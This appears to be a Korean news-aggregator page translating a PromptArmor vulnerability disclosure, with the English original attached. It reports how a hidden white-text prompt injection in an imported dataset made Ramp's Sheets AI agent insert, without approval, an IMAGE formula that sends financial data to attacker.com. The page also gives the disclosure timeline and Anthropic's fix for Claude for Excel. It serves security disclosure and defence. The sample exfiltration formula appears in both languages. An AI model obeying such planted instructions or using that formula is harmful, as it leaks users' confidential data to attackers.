메뉴
HN
Hacker News 31일 전

램프(Ramp) 시트 AI, 재무 데이터 유출 취약점 발견

IMP
8/10
핵심 요약

기업 지출 관리 플랫폼 램프(Ramp)의 스프레드시트 AI 에이전트에서 사용자 동의 없이 악성 수식을 삽입해 외부로 데이터를 유출할 수 있는 치명적인 취약점이 발견되었습니다. 해커가 제공한 외부 데이터에 숨겨진 간접 프롬프트 인젝션(Prompt Injection) 공격을 통해 기밀 재무 데이터가 공격자 서버로 전송될 수 있습니다. 해당 취약점은 보안 연구팀의 책임 있는 공개(Responsible Disclosure) 절차를 통해 2026년 3월 16일에 성공적으로 패치 및 해결되었습니다.

번역된 본문

위협 인텔리전스 (Threat Intelligence)

램프(Ramp)의 시트(Sheets) AI, 재무 데이터를 외부로 유출하다

램프(Ramp)의 시트(Sheets) AI에 존재하는 취약점을 통해 AI 에이전트가 사용자의 승인 없이 외부 네트워크 요청을 발생시키는 수식을 삽입할 수 있었으며, 이로 인해 간접 프롬프트 인젝션(indirect prompt injection)을 통한 데이터 유출 위험이 발생했습니다. 이 취약점은 램프(Ramp) 측에 책임 있게 공개되었으며, 램프의 보안 팀은 2026년 3월 16일에 해당 문제가 해결되었음을 확인했습니다.

배경 (Context)

램프(Ramp)의 시트(Sheets) AI는 Excel용 Claude와 비교할 수 있는, 사용자가 스프레드시트를 쉽게 다룰 수 있도록 돕는 에이전트(Agentic) 제품입니다. 이 기능은 사람의 개입(human-in-the-loop) 없이도 스프레드시트를 편집할 수 있으며, 외부 통신을 트리거하는 수식을 삽입할 수 있는 특성 때문에 데이터 유출 위험에 취약했습니다. 램프의 보안 팀은 우리의 보고 이후 이 문제가 해결되었음을 확인했습니다. 우리는 취약점이 발생할 때마다 이를 해결하고 강력한 AI 보안 태세를 유지하려는 램프의 노고에 감사드립니다. 책임 있는 공개와 관련된 자세한 내용은 글의 하단에 있습니다.

이 글에서는 신뢰할 수 없는 외부 데이터셋에 숨겨진 간접 프롬프트 인젝션이 램프(Ramp)의 AI를 조작하여 악성 수식을 삽입함으로써, 사용자의 작업 공간에서 기밀 재무 데이터를 유출할 수 있음을 보여줍니다. 이 과정에서 사용자의 승인은 전혀 필요하지 않습니다. PromptArmor는 Excel용 Claude에서 매우 유사한 위험을 식별한 바 있으며, Anthropic이 적용한 수정 사항에 대한 자세한 내용은 글의 하단에서 확인할 수 있습니다.

공격 체인 (The Attack Chain)

  1. 사용자가 기밀 재무 모델이 포함된 워크북을 엽니다.
  2. 사용자가 자신의 모델을 보완하기 위해 외부 데이터셋을 가져옵니다(import).
    • 산업 성장 통계가 포함된 스프레드시트가 재무 모델과 별도의 탭으로 가져와집니다. 사용자는 자사의 성장률을 산업 벤치마크와 비교하려고 합니다.
    • 이 참조 데이터셋은 웹사이트, 이메일 또는 공유 드라이브 등 신뢰할 수 없는 외부 출처에서 가져온 것입니다.
  3. 참조 데이터셋에 숨겨진 프롬프트 인젝션이 존재합니다.
    • 간접 프롬프트 인젝션은 흰 글자(white-on-white text)로 숨겨져 있으며, 램프(Ramp)의 AI를 조작하여 다음 행동을 하도록 설계되었습니다: (1) 민감한 데이터 수집 (2) 해당 데이터를 포함하여 외부 네트워크 요청을 만드는 수식 생성 (3) 해당 수식을 사용자의 스프레드시트에 자동으로 삽입.
  4. 사용자가 램프(Ramp) AI에게 자신의 재무 모델과 산업 통계를 비교해 달라고 요청합니다.
  5. 램프(Ramp) AI가 프롬프트 인젝션에 속아 넘어가 악성 수식을 삽입합니다.
    • AI는 공격자의 URL을 사용하고 피해자의 민감한 데이터를 링크 끝에 추가하는 IMAGE 수식을 만들도록 조종됩니다.
    • =IMAGE("https://attacker.com/visualize.png? {victim_sensitive_financial_data_here} ")
  6. 악성 수식이 네트워크 요청을 발생시켜 재무 데이터를 유출합니다.
    • 램프(Ramp) AI는 어떠한 사용자 승인도 요구하지 않고 악성 수식을 삽입합니다.
    • 악성 수식은 공격자의 서버로 네트워크 요청을 트리거합니다.
    • 이 네트워크 요청은 최초의 기밀 '재무 모델' 시트에 있던 민감한 재무 데이터(공격자의 프롬프트 인젝션에 의해 Ramp AI가 수식에 포함시킨 데이터)를 노출시킵니다. 아래에서 공격자의 서버 로그가 피해자의 민감한 재무 데이터를 표시하는 것을 확인할 수 있습니다.

책임 있는 공개 (Responsible Disclosure)

PromptArmor 위협 인텔리전스 팀은 이 취약점을 램프(Ramp)에 책임 있게 공개했습니다. 램프의 보안 팀은 2026년 3월 16일에 이 문제가 해결되었음을 확인했습니다.

  • 2026년 2월 19일: PromptArmor가 security@ramp.com을 통해 취약점을 공개함
  • 2026년 2월 27일: PromptArmor가 후속 조치 진행
  • 2026년 3월 13일: PromptArmor가 후속 조치 진행
  • 2026년 3월 14일: 램프(Ramp)가 보고 접수를 확인함. 초기 보고서가 공개 프로그램 전환 기간 동안 제출되어 초기 응답이 지연되었다고 설명함.
  • 2026년 3월 16일: 램프(Ramp) 상태 업데이트: "보고서를 다시 한번 감사드립니다. 이 문제는 동부 표준시 오늘 정오 경에 해결되었습니다."

Excel용 Claude(Claude for Excel)의 해결 방법

Excel용 Claude가 출시되었을 때, PromptArmor는 거의 동일한 위험을 식별했습니다. 사용자에게 적절한 사전 인지 기회를 제공하지 않은 채 악성 수식이 데이터 유출을 트리거할 수 있는 문제였습니다.

원문 보기
원문 보기 (영어)
Threat Intelligence Table of Content Ramp’s Sheets AI Exfiltrates Financials A vulnerability in Ramp's Sheets AI allowed the agent to insert formulas that made external network requests without user approval, creating the risk of data exfiltration via indirect prompt injection. This vulnerability was responsibly disclosed to Ramp, and Ramp’s security team has indicated the issue was resolved on March 16, 2026. Context Ramp's Sheets AI is an agentic product that helps users operate on spreadsheets, comparable to Claude for Excel. The feature can edit spreadsheets without a human-in-the-loop and was vulnerable to data exfiltration risks due to its ability to insert formulas that trigger external communication. Ramp’s security team has indicated that, following our report, the issue was resolved. We appreciate Ramp’s dedication to maintaining a strong AI security posture and addressing vulnerabilities as they arise. Further details on the responsible disclosure are at the end of the article. In this article, we demonstrate that an indirect prompt injection concealed in an untrusted, externally sourced dataset could trigger the exfiltration of confidential financial data from the user’s workspace by manipulating Ramp’s AI to insert a malicious formula. No user approval is required. PromptArmor identified a very similar risk in Claude for Excel – details on the remediations applied by Anthropic are at the bottom of the article. The Attack Chain The user opens a workbook containing a confidential financial model The user imports an external dataset to complement their model A spreadsheet containing industry growth statistics is imported into a separate tab from the financial model. The user aims to compare their company’s growth to industry benchmarks. The reference dataset comes from an untrusted external source, e.g., a website, an email, or a shared drive. The reference dataset contains a concealed prompt injection An indirect prompt injection is hidden in white-on-white text, and is crafted to manipulate Ramp’s AI to: (1) collect sensitive data (2) generate a formula with that data that will make an external network request (3) insert that formula automatically into a user’s spreadsheet. The user asks Ramp AI to compare their financial model against the industry statistics Ramp AI falls for the prompt injection and inserts a malicious formula Ramp AI is manipulated into building an IMAGE formula that uses an attacker’s URL and appends the victim’s sensitive data to the end of the link. =IMAGE(“https://attacker.com/visualize.png? {victim_sensitive_financial_data_here} ”) The malicious formula makes a network request, exfiltrating financial data Ramp AI inserts the malicious formula without requiring any user approval. The malicious formula triggers a network request to the attacker’s server. This network request exposes the sensitive financial data that was in the initial confidential “Financial Model” sheet (which Ramp AI included in the formula due to the attacker’s prompt injection). Below, the attacker’s server logs display the victim’s sensitive financial data: Responsible Disclosure The PromptArmor Threat Intel Team responsibly disclosed this vulnerability to Ramp. Ramp's security team indicated that the issue was resolved on March 16, 2026. Timeline Feb 19, 2026 PromptArmor discloses via security@ramp.com Feb 27, 2026 PromptArmor follows up Mar 13, 2026 PromptArmor follows up Mar 14, 2026 Ramp confirms receipt of report; notes that the initial report was submitted during a transition period between disclosure programs, explaining the delay in initial response. Mar 16, 2026 Ramp states: “Thank you again for your report. This issue was resolved earlier today at approximately noon eastern time.” How Claude for Excel Remediated When Claude for Excel was released, PromptArmor identified a nearly identical risk – malicious formulas could trigger data exfiltration without users being presented an adequate opportunity for informed human review. Note: Claude for Excel did leverage human-in-the-loop, but malicious formulas were not visible in the editing approval prompt, thereby impairing the protection's efficacy. Anthropic updated Claude for Excel to display a red warning interstitial when a formula that can cause external network traffic is being inserted. The new warning displays the full formulas being inserted, and the documentation was updated to better inform users of the risk.
AI 보안 프롬프트 인젝션 데이터 유출 에이전트 취약점